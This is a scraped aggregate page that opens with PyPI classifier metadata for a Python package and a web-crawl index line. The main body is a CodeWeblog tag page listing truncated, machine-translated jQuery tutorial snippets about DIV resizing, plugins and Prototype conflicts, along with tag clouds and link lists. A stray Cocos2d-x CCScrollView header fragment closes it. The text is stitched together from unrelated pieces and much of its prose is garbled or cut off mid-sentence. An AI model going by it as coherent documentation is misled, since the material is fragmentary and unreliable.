- Downloads (All Versions):
- 7 downloads in the last day
- 141 downloads in the last week
- 506 downloads in the last month
- Author: Alexander Schepanovski
- License: BSD
- Categories
- Development Status :: 4 - Beta
- Intended Audience :: Developers
- License :: OSI Approved :: BSD License
- Operating System :: OS Independent
- Programming Language :: Python
- Programming Language :: Python :: 2
- Programming Language :: Python :: 2.6
- Programming Language :: Python :: 3
- Programming Language :: Python :: 3.3
- Programming Language :: Python :: 3.4
- Programming Language :: Python :: Implementation :: CPython
- Programming Language :: Python :: Implementation :: PyPy
- Topic :: Software Development :: Libraries :: Python Modules
- Package Index Owner: suor
- DOAP record: whatever-0.4.1.xml | https://pypi.python.org/pypi/whatever | CC-MAIN-2015-40 | refinedweb | 293 | 54.32 |
Source
RSS
php jquery div resize
sponsored links
Jquery the resize method
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" " "> <html> <head> <meta http- <title>Insert title here</title>
JQuery div fade effects to achieve
Oh, finally is the first study JQuery, JQuery reference on a greater understanding. Here, let me know the JQuery code is written in what place.
Let div resize based on content
div1 ( width: auto; display: inline-block! important; display: inline; )
[JQuery] FullCalendar Memo
1. With the google calendar link, do not forget to join <script type='text/javascript' src='js/gcal.js'/> events: $. fullCalendar.gcalFeed (" @ gmail.com/private-660ae86cc26345cff34304
jQuery grammar summary and Notes
1, Introduction 1.1, an overview of WEB2.0 and ajax with the idea at the rapid development of Internet communication, one after another there have been some excellent Js framework, there is one of the most famous Prototype, YUI, jQuery, mootools, Bindows,
jQuery Caution Point Skills 1
1, $ function, the use of skill and attention to points <div value="content"> aaa </ div> $ ( "# msg"). value is written is wrong, because: Through jquery's $ () reference element, including through the id, class, ...
JQuery skills summary (reproduced)
1, on a reference page elements by jquery's $ () reference element, including through the id, class, element names, as well as elements of the level of relations and conditions of dom, or xpath method, and returns the object for the jquery object ...
jquery Skills Summary
jquery skill concluded a brief 1.1, an overview of thinking as WEB2.0 and ajax on the Internet, the rapid development of communication, one after another there have been some excellent Js frameworks, which are more well-known Prototype, YUI, jQuery, mooto
jquery rookie Getting Started
Transfer from: B7% C9% D4% BD% CA% B1% C9% D0/blog/item/c96d3716fc57da1d972b43e1.html I. Introduction 1.1, an overview of thinking as WEB2.0 and ajax on the Internet, the rapid development of communication, one after another there ha
add jquery.linscroll new function (js css scroll bar ie6 ie7 ff)
usage: $ ('. ScrollContent'). SetScrollNoArrow ((img: '_common / img / scrollbar / scroll_bar.jpg', width: 8), (Img: '_common / img / scrollbar / scroll_btn.jpg', height: 16) ); <script> / * * Adding by Jerome Xie * Supportin
jQuery + Ajax + Struts2. js javascript
(1) jQuery's basic usage: WEB2.0 and ideas with ajax the rapid development of Internet communication, one after another there are some excellent Js framework, some of the more famous are Prototype, YUI, jQuery, mootools, Bindows and domestic JSVM fram
jQuery great running skills
jQuery Great running skills 1. A reference element on the page By jquery's $() Reference element, including through id.class. Element name and element-level relations and dom Xpath conditions or methods , And return the object to jquery object ( Colle
jQuery skills summary (z) with more detailed information on 07, there needs to be updated. . . . I. Introduction 1.1 Overview <br /> WEB2.0 and ajax with ideas on the Internet's rapid development of communication, one after
JQuery Technical Summary
Keywords: jquery Transfer from: I. Introduction 1.1, an overview of ideas with the ajax WEB2.0 and the rapid development of Internet communication, one after another there are some excel
jquery and prototype conflict Using jQuery with Other Libraries
Category: Overriding the -function (rewrite $) However, you can override that default by calling jQuery.noConflict () at any point after jQuery and the other library have both loaded. For example: The first is to join jQuery.noConflict (); using jQue ...
Common Skills jquery
Abstract: 1, a reference element on the page by jquery's $ () reference element, including through the id, class, element name, and the elements of hierarchy and the dom xpath conditions or methods, and the return of the object for the jquery object (
jQuery 1.4: 15 you should be aware of the new features (translation)
jQuery('ul li:contains( Apple )').nextUntil(':contains( Pears )'); // Get banana , Grape, Strawberry jQuery 1.4: 15 A you should be aware of the new features (translation) Collection view plaincopy to clipboardprint? jQuery ('ul li
Introduction to JQuery
I. Introduction 1.1 Overview With the thought WEB2.0 and ajax development in the rapid spread of the Internet, start to appear some wonderful Js framework, some of the more famous are Prototype, YUI, jQuery, mootools, Bindows as well as domestic JSVM fram
jquery Syntax Summary
1. A reference element on the page By jquery's $() Reference element, including through id.class. Element name and element-level relations and dom Xpath conditions or methods , And return the object to jquery object ( Collection object ), Dom can not
[Change] jQuery great running skills
jQuery great running skills 1, a reference element on the page by jquery's $ () reference element, including through the id, class, element name, and the elements of hierarchy and the dom xpath conditions or methods, and the return of the object for t
Fall in love with jquery 1.4 (the latest API and offline development attached manual)
1. Pass parameters to the jQuery (...) Before, jQuery can be attr method of setting an attribute, can transfer the property name and value, it can contain several groups of a particular object attribute name-value pairs. In jQuery 1.4, you can put a param
JQuery several useful methods
$. Browser. Browser type: detection of browser type. Effective parameters: safari, opera, msie, mozilla. Such as the test for ie: $. Browser.isie, ie the browser is returned true. $. Each (obj, fn): GM's iteration function. Iteration can be used
jQuery: jQuery to expose hidden features
jQuery does not like his face shown, only those who rated the methods available to us. Other within the code in his library with a lot of cool potential method is convenient, we are waiting to be discovered. In this article, I will lead you to appreciate
jQuery 1.4 released: new features of the 15 instances of Jingjiang
Wrote jQuery 1.4 recently released. Than we expected, this is not a simple patchwork, 1.4 includes many new features, enhancements and performance improvements! This immediately introduces you to those you may find useful new features and optimization enh
Jquery and Prototype co-existence approach
Way: Java code <html> <head> <script src="prototype.js"> </ script> <script src="jquery.js"> </ script> <script> jQuery.noConflict (); / / Use jQuery via jQuery (...) jQuery (document). re
Jquery javascript framework to co-exist with other
GENERAL The jQuery library, and virtually all of its plugins are constrained within the jQuery namespace. As a general rule, "global" objects are stored inside the jQuery namespace as well, so you shouldn't get a clash between jQuery and any
jQuery to find all child elements
Using the selector to select a particular element'd easily what. Css (), find () ah a lot, find all the child elements, but there was a welcome surprise for a half will not find a way, but later found that one-pass wildcards. Find all descendant
jQuery to achieve the principle of - the implementation of a debug class
Js code debugging often need to use alert (), each time heard harsh 'when ...', then write a brief on their own debug information output function debug. Recently, the jQuery framework, so he modeled his writing style improved a bit. Here I put som
Some common methods jQuery (Reprinted)
Reprinted Style of operating elements include the following ways: $ ("# Msg"). Css ("background"); / / returns the background color of the element $ ("# Msg"
Skills Summary jquery [transfer]
I. Introduction 1.1 Overview and ajax thoughts with WEB2.0 the rapid development of Internet communication, has been found in some excellent Js framework, one of the more famous are Prototype, YUI, jQuery, mootools, Bindows and domestic JSVM frameworks, t
Solution is not compatible with jquery and prototype of the Road
$ jquery and prototype are used instead of frequent document.getElementById () operation, so they must be used together, can cause conflict , how to get jquery and prototype -compatible coexistence of it, which I described the following two methods:
set the background image div
JavaEE developer and rarely write directly JS code. The author is also true, at best, is to use jQuery for JS control. Why go the set as the background to the DIV in jQuery? Because jQuery DIV is the most common element. Use the following method which set
jquery Skills Summary (rpm)
jquery Skills Summary (transfer): I. Introduction 1.1 Overview and ajax thoughts with WEB2.0 the rapid development of Internet communication, has been found in some excellent Js framework, one of the more famous are Prototype, YUI, jQuery, mootools, Bindo
JQuery common technique: jquery dom object object conversion
1, reference to the element on the page by jquery's $ () refers to elements, including through the id, class, element names and hierarchical relationships of elements and the dom xpath conditions or methods, and the return of the object is jquery obje
function createDiv(){ jQuery("body").css({overflow:"hidden"}); var browserwidth = jQuery(window).width(); var browserheight=jQuery(window).height(); var scrollleft = jQuery(window).scrollLeft(); var scrolltop = jQuery(window).scrollTop(); var height =brow
jQuery and prototype co-
Way a (recommended) <html> <head> <script src="boot.js"></script> <script> var $j = $import("org.jquery.$"); var $p= $import("net.nioc.prototype.$"); //Use jQuery via $j(...) $j(document).ready(function(){ $j("div").hide
jquery1.4 Chinese Document
jquery1.4 Chinese Document Original: By convention, we provide two copies of jQuery, one is minimized ( We are now using Google Closure as the default compression tool ), One is uncompressed ( For error correcti
javascript Summary (1) the framework
Done. NET, ROR, now two years of full-time JS. On the development process, problems and did practice, and from the following aspects, be a memory account when summing up. The framework is only a general overview, I hope you will participate in the di ...
ajaxfileupload upload files with parameters
Best be achieved by working in the file upload without refresh, of course, can not be achieved XmlHttpRequest object file uploading. After the fileupload google to find JQuery plug, this plug-in through an IFrame and create a form in the IFrame to ac ...
jQuey grammar summary and notes
1, a reference element on the page by jquery's $ () reference element, including through the id, class, element name, and the elements of hierarchy and the dom xpath conditions or methods, and the return of the object for the jquery object (a collecti
jQueryDIV automatic contour
View results Download jQuery DIV automatic contour plug, that is to control the website content within the DIV element regardless of the number of them will be calculated automatically through the high, so that your page layout is more beautiful, to
jquery1.43 core source code analysis
jquery core Of a structure jquery. Compared to other traditional library constructed object methods. Jquery provides a very different approach. It chooses to create a new strange world. First of all the jquery code is an automatically wrapped up the closu
Adding jquery canceled and the contents of the div to replace demo
Recent projects often applied to the jQuery, with the specific cases a brief introduction to jQuery's div contents to add, cancel and replace the relevant content such as application skills. Case: Add institution information, and at the same time ...
My first jQuery plugin - rounded DIV
Effect: Reference: round.css: round.js: html: Details see Annex! Relatively simple, do not laughed ah!
jquery animate the div
QQ subscription box, in the health news Forum, a feature is that when click on the title will display dynamic news content, click again to put away when the contents show only a brief introduction. Mimic the function of practice today and the next jq
jQuery hover Div background transformation (color slide)
<html> <head> <meta http- <title> jQuery hover Div background transformation </ title> <style type="text/css"> . Divbox ( hei
Original: Div + CSS + JS dialog box (using JQuery)
CSS section /*-------- Div dialog -----------*/ # Dialog ( background-color: # 89A6CA; height: 180px; width: 300px; border: 1px solid # 999; position: absolute; z-index: 9999; ) # Dialog # title ( background-image: url (images / pupop_bg.png); background-
jquery scroll in the end determine whether the Department of div
<! DOCTYPE HTML PUBLIC "- / / W3C / / DTD HTML 4.0 Transitional / / EN"> <HTML> <HEAD> <TITLE> This is main page. </ TITLE> <META NAME="Generator" CONTENT="EditPlus"> <META NAME=
jQuery: the coordinates of the mouse and div
jQuery coordinates of the mouse and div Scenario: When the mouse leaves the div, remove the div after 3 seconds The div's class for the sp function spon_out(event){ var x=event.pageX-this.offsetLeft; var y=event.pageY-this.offsetTop; if(x < 0
jQuery to submit parameter returns the data and displayed in the div
Description: The above two kinds of methods can be! Which test for the server url, returns the data to a jsp page that displays the contents of this page id of the DIV in the post. (info: 'He He') for the parameters passed to the server
Recent
http pku.eunji.com zggps2014
dwr callback boolean
nginx play framework proxy
http: 61.133.106.7006 wlkp
http 172.16.1.7jwweb
windows mod_wl_22下载
http::8089
http: 172.28.2.166 apms
搜索 222.86.224.160:8088
Recent Entries
Agitator
AltaVista search engine, directory traversal problems
Open-source book Continuous Integration with Hudson
css to achieve the directory tree navigation menu
I think design patterns series (2) - Strategy pattern [C + +, design patterns]
Background task processing and deferred execution in Django
[Transferred] to a small team with an average age of
FLEX and JAVA on the performance front-end communication and speed of response
Acquaintance J2EE and AJAX
BPM Workflow Learning
Tag Cloud
php calculate total gridview
mvc3 how to load objects into a table
osb jms example
zk Window focus
span innerhtml dwr
fullcalendar save events asp.net
getactiveobject sapgui
http: 192.168.0.65:7001 LGSFLS
embedded, embeddable and crud
showmodaldialog in spring example
jquery event key imemode
how to automate black berry simulator using qtp
ejb 2" tutorial "WebSphere Process
tadoquery before delete
f5 press from javascript
HTML5 xsd schema
adito+proxy+connect
primefaces code complete not working in eclipse
struts1, print bean attributes
extjs filtrer datastore
what is request timeout in flex 3 httpservice
linkedhashmap memory
free download itextrenderer jar
Array Parsing in Jackson
MVP GWT sample application code
extjs desktop right click
template richfaces with listbox
netbeans uml
css exceptions
Random Entries
Super simple. Super-useful version of the preview feature to upgrade gadgets ----
js Operation Gadget Tips
linux command-line multi-threaded downloading tool
Internet of Things should really start? - Property networking software
oracle dataguard physical configuration
hibernate under import.sql the i18n issues
Under the simple linux device-dpSegmentation Chinese word
Pthread_t * thread to thread variables dynamically allocated space
[Transfer] A * algorithm using the heuristic function (2)
(Rpm) collection a piece of code, spare
Categories
Codeweblog
Java
PHP
Ruby
AJAX
Development
Web
Mobile
CPP
Python
Flash
DotNet
Database
OS
Tech
Develop
Industry
Internet
Related
bubbleSorting arraylist
open source iphone mmo
jquery +"image" contrast
castor myeclipse tutorial
hibernate cause tomcat outofmemory
TUTORIAL JAVA + FLEX + IREPORT
webdriver findelement
silverlight serialize bitmapimage
comparison of two values in flex
aidl import custom android
url encode commandline linux arabic php
apkdecoder threadsave
http: 192.168.1.51:85 webcamera.html
http:1158.130.21.6 qass
w3.te577
CodeWeblog.com
XHTML
CSS
Processed in 0.058 second(s), 11 Queries. | http://www.codeweblog.com/stag/php-jquery-div-resize/ | CC-MAIN-2014-52 | refinedweb | 2,537 | 52.8 |
Created on 2019-08-23 07:39 by hroncok, last changed 2019-09-05 14:43 by vstinner. This issue is now closed.
There is a regression between Python 3.7 and 3.8 when using PySys_SetArgvEx(0, NULL, 0).
Consider this example:
#include <Python.h>
int main() {
Py_Initialize();
PySys_SetArgvEx(0, NULL, 0); /* HERE */
PyRun_SimpleString("from time import time,ctime\n"
"print('Today is', ctime(time()))\n");
Py_FinalizeEx();
return 0;
}
This works in 3.7 but no longer does in 3.8:
$ gcc $(python3.7-config --cflags --ldflags) example.c
$ ./a.out
Today is Fri Aug 23 07:59:52 2019
$ gcc $(python3.8-config --cflags --ldflags --embed) example.c
$ ./a.out
Fatal Python error: no mem for sys.argv
SystemError: /builddir/build/BUILD/Python-3.8.0b3/Objects/unicodeobject.c:2089: bad argument to internal function
Current thread 0x00007f12c78b9740 (most recent call first):
Aborted (core dumped)
The documentation explicitly mentions passing 0 to PySys_SetArgvEx:
"if argc is 0..."
So I guess this is not something you shouldn't do.
Oops, it's my fault! PR 15415 fix the crash.
The regression was introduced by:
commit 74f6568bbd3e70806ea3219e8bacb386ad802ccf
Author: Victor Stinner <vstinner@redhat.com>
Date: Fri Mar 15 15:08:05 2019 +0100
bpo-36301: Add _PyWstrList structure (GH-12343)
Simplified change:
- static wchar_t *empty_argv[1] = {L""};
+ wchar_t* empty_argv[1] = {L""};
It's a deliberate change to not waste memory: PySys_SetArgvEx() (make_sys_argv()) is only called once, whereas static keeps the memory for the whole lifecycle of the process.
But I didn't notice a subtle issue with memory allocated on the stack: the code works well with gcc -O0! The bug only triggers with gcc -O3.
New changeset c48682509dc49b43fe914fe6c502bc390345d1c2 by Victor Stinner in branch 'master':
bpo-37926: Fix PySys_SetArgvEx(0, NULL, 0) crash (GH-15415)
New changeset ca9ae94a2aba35d94ac1ec081f9bcac3a13aebd3 by Victor Stinner in branch '3.8':
bpo-37926: Fix PySys_SetArgvEx(0, NULL, 0) crash (GH-15415) (GH-15420)
I tested my fix manually using example from msg350262 and gcc -O3 (./configure && make): I can reproduce the crash without the change, and I confirm that my change fix the crash.
Thanks Miro for the bug report: the fix will be included in next Python 3.8 beta release. I fixed the bug in 3.8 and master branches (3.7 is not affected).
FYI this bug was found in paraview in Fedora Rawhide: | https://bugs.python.org/issue37926 | CC-MAIN-2021-21 | refinedweb | 390 | 69.28 |
Knock yourself out with whatever changes you want to make. Change the class,
move it, rename it... the result is, unless my tests have a bug, the solvers
need some work.
Enjoy!
-Greg
On Sat, Oct 1, 2011 at 9:50 PM, Gilles Sadowski <
gilles@harfang.homelinux.org> wrote:
> Hi Greg.[1]
>
> On Sat, Oct 01, 2011 at 08:28:52PM -0500, Greg Sterijevski wrote:
> > Per Phil's suggestion, they are now in
> > test/../../optimizers/NISTBatteryTest.java See JIRA: MATH-678 for further
> > info.
>
> There currently isn't much info over there...
>
> Also, the new "NISTBatteryTest" test class is quite unwieldy. The usual way
> would be that one unit test class tests for its corresponding class in the
> "main" source code. E.g.
> BOBYQAOptimizerTest
> contains tests for
> BOBYQAOptimizer
>
> So, instead of clumping all tests for all optimizers in a single
> "BatteryTest"
> class (and discriminate by long method names that contain the optimizer
> class name), they should rather go in their own optimizer-dedicated
> classes,
> e.g.:
> BOBYQAOptimizerNISTTest
> PowellOptimizerNISTTest
> etc.
> Hence someone can concentrate on fixing one optimizer at a time, focusing
> on
> one test class at a time.
>
> You can use inheritance in order to store all the common functionality:
>
> public class NISTAbstractTest {
> // Common functions and general test routines and checks.
>
> private double[] run(MultivariateRealOptimizer optim,
> DifferentiableMultivariateRealFunction func,
> double[] start) {
> return optim.optimize(1000000, func, GoalType.MINIMIZE,
> start).getPointRef();
> }
> }
>
> BOBYQAOptimizerNISTTest extends NISTAbstractTest {
> @Test
> public void lanczos() {
> double[] result = run(new BOBYQAOptimizer(10),
> lanczosObjectFunc,
> new double[] { 1.2, 0.3, 5.6, 5.5, 6.5, 7.6
> });
> TestUtils.assertEquals(correctParamLanczos, result, 1e-8);
> }
> }
>
> That would also make it easier to connect specific JIRA tickets to specific
> issues/optimizers, as suggested by Phil.
>
> >
> > Incidentally, the tests were attached to the email thread in regard to
> > NonLinearConjugateGradientSolver.
>
> I didn't get any message with such an attachement. Are you sure that it
> wasn't stripped off?
> Anyways, _this_ thread, and my question, is about coverage of the BOBYQA
> code. Testing for this shortcoming of our BOBYQA test suite is not the same
> issue as an optimizer failing the NIST test suite. Hence the request to
> create a specific (and possibly temporary) "BOBYQAOptimizerCoverageTest".
>
>
> Best regards,
> Gilles
>
> [1] A: Because it messes up the order in which people normally read text.
> Q: Why is top-posting such a bad thing?
> A: Top-posting.
> Q: What is the most annoying thing in e-mail?
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@commons.apache.org
> For additional commands, e-mail: dev-help@commons.apache.org
>
> | http://mail-archives.apache.org/mod_mbox/commons-dev/201110.mbox/%3CCACMPRi1ZiXVa471kAjuoCO1Nsk34Fmo7zmyxCz6QP9_gAuiV4g@mail.gmail.com%3E | CC-MAIN-2015-32 | refinedweb | 418 | 50.02 |
I have two separate .py files. One contains my GUI environment, and the other holds the functions used by that environment. I imported the class with the functions into the GUI file and from the GUI created an object of said class. However when I go to run a method/function from within the GUI, I get an error letting me know...
- Code: Select all
TypeError: ckbutton1() takes 0 positional arguments but 1 was given
Traceback (most recent call last):
File "C:\Users\funk\Documents\program.py", line 125, in <module>
sys.exit(app.exec_())
SystemExit: 0
I've tried counteracting this by using *args as an argument when defining my functions, but this doesn't seem to help.
I've been told before that I need to use 'self' so I tried using it as a lone argument, and the results were more of the same. I then learned about the __init__ function, which to me looks like it should just do initial tasks for you, such as alias 'self.object' to 'object', or something like that. In pseudo-code, here's a piece of my two files.
- Code: Select all
class exampleclass:
def __init__(self):
# Do some initial text doodad.
# potentially important
def ckbutton1(self):
print("test test test")
and the GUI...
- Code: Select all
example = exampleclass()
when button 'pressed': example.chkbutton1
Anyone out there have the time to clear this up for me? I read through the documentation on passing arguments and it was weird to me, to say the least. Also, I apologize if any of this doesn't make much sense, I'm incredibly tired today. | http://www.python-forum.org/viewtopic.php?f=10&t=6939 | CC-MAIN-2017-13 | refinedweb | 271 | 65.01 |
We will go through a tutorial where Python and Flask will be used. However, you will soon realize that Python and Flask are the less important parts here. Due to the nature of the setup (a docker-compose file) you shouldn't have any trouble swapping the Docker for my Flask app with whatever else you want to monitor.
So, what are we actually doing here? What is the final goal?
We will create docker compose file which will instantiate the following services:
- A web app of your own that you want to monitor
- An instance of Telegraf, which is a tool that can send all sorts of metrics about your app's performance to a database.
- An instance of InfluxDB, which is the database where all the Telegraf info will go to, and also where you will write your own metrics from your application.
- Grafana, which will serve to create an awesome dashboard and display all that information.
Look at the power of Grafana by visiting their demo here
The duo Telegraf/InfluxDB might get confusing. You could consider that Telegraf will record into InfluxDB data about your performance (cpu usage, memory usage, etc...) But if you want to record things related to the content of your app (requests made to a certain endpoint, how many times a function has been called, how many times it throws an error...) you need to actively save that into InfluxDB from your application. We will see how.
Getting Started
You may clone my repo if you want to follow this easier, or build it yourself as we go:
Setting up the project
Your app
Go to the folder that contains the app you want to use for this (or look at the cloned repo). The important thing is that you should have a working
Dockerfile that if you run it, it launches your app standalone.
Now go ahead and create an empty
docker-compose.yaml file.
version: "3" services: metricsweb: container_name: metricsweb build: . ports: - 5000:5000 depends_on: - influxdb
As you see, we start by adding one service: Our app. In my case, it's a Flask app, so I am opening the port 5000. This service depends on the future service
influxdb. Notice the
build parameter. For it to work, you need to have a
Dockerfile in the same directory. Mine looks like this:
FROM python:3.7.4-slim-stretch COPY . /app WORKDIR /app EXPOSE 5000 RUN pip install -r requirements.txt ENTRYPOINT python /app/main.py
Grafana
Grafana is an open source analytics and visualizations solution which is compatible with a lot of databases. In this example we are using InfluxDB since it's really quick and optimized to store time series data, but for example you make Grafana read from your SQL database.
For more information, visit their website
This is the relevant bit you need to add in the
docker-compose:
grafana: container_name: grafana image: grafana/grafana:latest ports: - 3000:3000 volumes: - ./grafana/data:/var/lib/grafana
Pretty straightforward. Grafana uses the port 3000 for the web app. We will configure this later.
InfluxDB
Take a look at the Influx website so you will get an idea about its features. In order to add it to our stack, we need this additional piece inside our docker-compose file:
influxdb: container_name: influxdb image: influxdb:latest ports: - 8086:8086 env_file: - 'env.influxdb' volumes: - ./influxdb/data:/var/lib/influxdb
Some important things:
- I am mounting a local directory volume to store the data. This is so data persist even if you destroy the stack and recreate it again (I did the same with Grafana in the previous step)
- I am reading some variables from an env file. You could also insert them straight into the yaml file, it makes no difference. The most important variable is
INFLUX_DB, which tells you the name of the DB that will be created when the stack goes up. Here is the file I am using:
INFLUXDB_DATA_ENGINE=tsm1 INFLUXDB_REPORTING_DISABLED=false INFLUX_DB=metrics INFLUXDB_USER=admin INFLUXDB_ADMIN_ENABLED=true
Telegraf
Telegraf is made by the same company that makes InfluxDB. You can read more about that here It's a server agent with a lot of plugins that can connect to InfluxDB and store many metrics about your application: CPU usage, memory usage, etc... You can definitely extend what it can detect.
This is the relevant docker-compose bit:
telegraf: container_name: telegraf image: telegraf container_name: telegraf restart: always depends_on: - influxdb environment: HOST_PROC: /rootfs/proc HOST_SYS: /rootfs/sys HOST_ETC: /rootfs/etc volumes: - ./telegraf.conf:/etc/telegraf/telegraf.conf:ro - /var/run/docker.sock:/var/run/docker.sock:ro - /sys:/rootfs/sys:ro - /proc:/rootfs/proc:ro - /etc:/rootfs/etc:ro
Notice that besides the volumes that we mount to have persisting data, we have some environment variables telling Telegraf where to get certain information about processes and system.
For the volumes part to work, you will need to create a
telegraf.conf file in your local directory with some settings. Here you can see the contents. It's pretty basic and surely it can be improved.
To summarize, here is the full
docker-compose.yaml that you will need:
Add code for your metrics
You are ALMOST done. If we would bring up the stack right now, everything would work fine, except the fact that your application wouldn't be sending anything to Influx and you would only have access to system data. Let's add something:
Consider that I only have a
main.py file which is a very simple Flask web app, this is what I have:
from flask import Flask from datetime import datetime from influxdb import InfluxDBClient client = InfluxDBClient('influxdb', 8086, 'admin', 'admin', 'metrics') app = Flask(__name__) @app.route("/hello") def hello(): client.write_points([{ "measurement": "endpoint_request", "tags": { "endpoint": "/hello", }, "time": datetime.now(), "fields": { "value": 1 } }]) return "Hello World!" @app.route("/bye") def bye(): client.write_points([{ "measurement": "endpoint_request", "tags": { "endpoint": "/bye", }, "time": datetime.now(), "fields": { "value": 1 } }]) return "Bye World!" if __name__ == "__main__": app.run (host="0.0.0.0")
See how we first initialize a client for the database with the proper parameters, and then on each endpoint, we call the method to write into the database with the relevant content. I have chosen to record a "1" every time the endpoint is called, so later I can visualize that in the dashboard by requesting the sum of that field. Not the only way to do this, but just one way.
Up and running
Build with docker-compose
Run this in your console to bring the stack up:
docker-compose up --build
(to bring it up later on, omit the build argument if you don't have anything new to rebuild)
Your stack would now run on interactive mode (you will see the logging appearing in your console). You can stop it by pressing Ctrl+C. However, by doing so the stack doesn't fully go down. You would then need to do
docker-compose down
If you want to launch it detached from the console, do
docker-compose up -d
Configuring the dashboard
Ok, so your stack is up and running. Make some calls to your api endpoints so it registers some visits and there is some data recorded in the database. Then open Grafana by going to
How to use Grafana
After login (admin/admin), first thing you need to do is to add a data source:
You need to configure InfluxDB using
influxdb as a host name, because that is the name of the service in the docker compose file. Otherwise we would need to inspect the container to find the internal Docker IP address and that's more convoluted because it can change. Using
influxdb to autodiscover the current IP will save us the trouble.
Create a new dashboard...
And you are ready to add new panels. For this example I am going to add the percentage of idle CPU. I have this data courtesy of Telegraf. Since this is a trivial app, you will see that the percentage is huge, because I am doing nearly nothing with this app:
If you click on the lower part of the screen, in the query builder, you can select your FROM (in this example we only have one database) and that should autopopulate the dropdown menus with the available selections.
Look at this other panel. This creates a counter of the amount of times
/hello has been visited. This data comes from the influxdb code that we have put into our Python app
Look how
endpoint_request appears in the dropdown, since that is the key we are saving from our code. Then you can choose what to do with this data. In my case I present the sum of all entries in a counter.
As you see, Grafana is a really cool and comprehensive tool. I recommend you to play around building panels for different metrics. It's really powerful!
I hope you could find some use from this tutorial. Grafana and Influx are also a new subject for me, so if you have any tips or comments, let me know!
Discussion (0) | https://dev.to/rubenwap/monitor-the-behavior-of-your-python-app-by-learning-influxdb-grafana-and-telegraf-3ehg | CC-MAIN-2021-43 | refinedweb | 1,519 | 62.78 |
This forum is closed. Thank you for your contributions.
i am trying to build a traffic gererator. the debug picks up no errors but when i run it it won't work. The error is at. My code is
#include "pch.h"
#include <stdio.h>
#include <iostream>
#include <Windows.h>
#include <string>
using namespace std;
char x = 0;
int y = 0;
int a = 0;
char z = 0;
int main()
{
printf("Enter Website to Bot\n");
scanf("%c", x);
printf("Number of Bots to Send to Link\n");
scanf("%s", y);
printf("Browser You Would Like to Open Website In\n");
scanf("%c", z);
while (x < a) {
system("<z> x");
x = x-1;
}
}
Your code has several problems:
The first scanf needs &x, not x, as the second argument. Same issue with third scanf.
The second scanf needs %d and &y, not %s and y, to read an int into y.
Your while statement will evaluate to false since x will be positive.
Your call to the system function will not cause <z> or x to be expanded and replaced with the one character values of z and x. It will actually try to execute the command <z> and the argument to that command will
be the letter x.
Your design has problems also:
How do you intend to fit the name of a website in a single char?
How do you intend to fit the name of a browser in a single char?
Why are you using global variables?
Why are you including unused headers pch.h, iostream, and string?
Why are you compiling as C++ when your entire function is in C?
You need to acquire some basic programming skills before attempting a complicated project. You will get much better support if post in one of the Visual C forums.
And once you acquire the skills, you should pick a project other than trying to launch a denial of service attack against a website. If you persist in this particular endeavor, you will probably get no help at all in any of these forums. | https://social.microsoft.com/Forums/en-US/fa696115-242b-48a0-868b-8c91f41440d7/c-error?forum=academicprojectprogram | CC-MAIN-2022-27 | refinedweb | 345 | 82.95 |
kgoldrunner
#include <kgoldrunner.h>
Detailed Description
This class serves as the main window for KGoldrunner.
It handles the menu, toolbar and keystroke actions and sets up the game, scene and view.
Main window class
Definition at line 41 of file kgoldrunner.h.
Constructor & Destructor Documentation
Default Constructor.
Definition at line 56 of file kgoldrunner.cpp.
Default Destructor.
Definition at line 177 of file kgoldrunner.cpp.
Member Function Documentation
Definition at line 676 of file kgoldrunner.cpp.
Definition at line 686 of file kgoldrunner.cpp.
To save edits before closing.
Definition at line 908 of file kgoldrunner.cpp.
This function is called when this app is restored.
The KConfig object points to the session management config file that was saved with saveProperties.
Definition at line 852 of file kgoldrunner.cpp.
Definition at line 835 of file kgoldrunner.cpp.
This function is called when it is time for the app to save its properties for session management purposes.
Definition at line 843 of file kgoldrunner.cpp.
Definition at line 779 of file kgoldrunner.cpp.
Definition at line 774 of file kgoldrunner.cpp.
Used to indicate if the class initialised properly.
Definition at line 58 of file kgoldrunner.h.
The documentation for this class was generated from the following files:
Documentation copyright © 1996-2020 The KDE developers.
Generated on Sat May 9 2020 04:10:01 by doxygen 1.8.7 written by Dimitri van Heesch, © 1997-2006
KDE's Doxygen guidelines are available online. | https://api.kde.org/4.x-api/kdegames-apidocs/kgoldrunner/html/classKGoldrunner.html | CC-MAIN-2020-29 | refinedweb | 242 | 53.58 |
Hey guys, so my assignment is making a program that takes 2 measure objects and multiplies them together and displays them in square feet.
What I'm trying to do is convert the feet into inches for both of the measure objects, then multiply the added inches together. Then I'm trying to reconvert the inches back to feet and inches so the output displays square feet and square inches. Problem is that's where I need guidance... If anybody knows of an easier method, I'm up for suggestions, but it has to remain as classes and functions though, that's what my professor wants.
These are the errors I get:
1: error C2664: 'Measure::Measure(const Measure &)' : cannot convert parameter 1 from 'int' to 'const Measure &' c:\users\michael\desktop\class folders\cs 1410\c ++ programs\measure\measure\measure.cpp 35 1 Measure
2: IntelliSense: no suitable constructor exists to convert from "int" to "Measure" c:\users\michael\desktop\class folders\cs 1410\c ++ programs\measure\measure\measure.cpp 35 9 Measure
#include <iostream> using namespace std; class Measure { private: int feet; int inches; public: Measure(); Measure (int f, int i) : feet(f), inches(i) { } Measure convert(int i);); return (a1 * a2); } Measure Measure::convert(int i) { Measure temp; temp.inches = i / 144; temp.feet = i %= 144; return temp; } Measure read() { int feet; int inches; cout << "Enter the length's feet: "; cin >> feet; cout << "Enter the length's inches: "; cin >> inches; return Measure(feet, inches); } | https://www.daniweb.com/programming/software-development/threads/321210/measuring-program-with-classes-and-functions | CC-MAIN-2017-26 | refinedweb | 247 | 50.16 |
You can subscribe to this list here.
Showing
2
results of 2
Part 2:
Since my site also has top level directories such as Graphics/ JavaScript/
etc. as well as a StyleSheet.css in the main directory, I need a convenient
way to refer to these from subdirectories.
I do this by prepending a string I call the "root dir" to my relative links:
def rootDir(self):
'''
Returns the root directory of the site appropriate for prepending to
relative paths, such as Graphics/foo.gif. Will return '', '../', '../../', etc.
'''
parts = self.request().urlPath().split('/')
numExtraParts = len(parts) - parts.index('MyContext') - 2
return '../' * numExtraParts
So I might have a link that looks like this:
'%sStyleSheet.css' % self.rootDir()
My host name, WebKit adapter name and context name can change at any time
and the existing code will work fine since I use ../
Upon deployment to the production environment, I could leave this as is, or
change rootDir() to return '';.
| http://sourceforge.net/p/webware/mailman/webware-discuss/?viewmonth=200103&viewday=25 | CC-MAIN-2014-23 | refinedweb | 157 | 65.22 |
#include <CCScrollView.h>
override functions
Reimplemented from CCLayer.
Reimplemented in CCTableView.
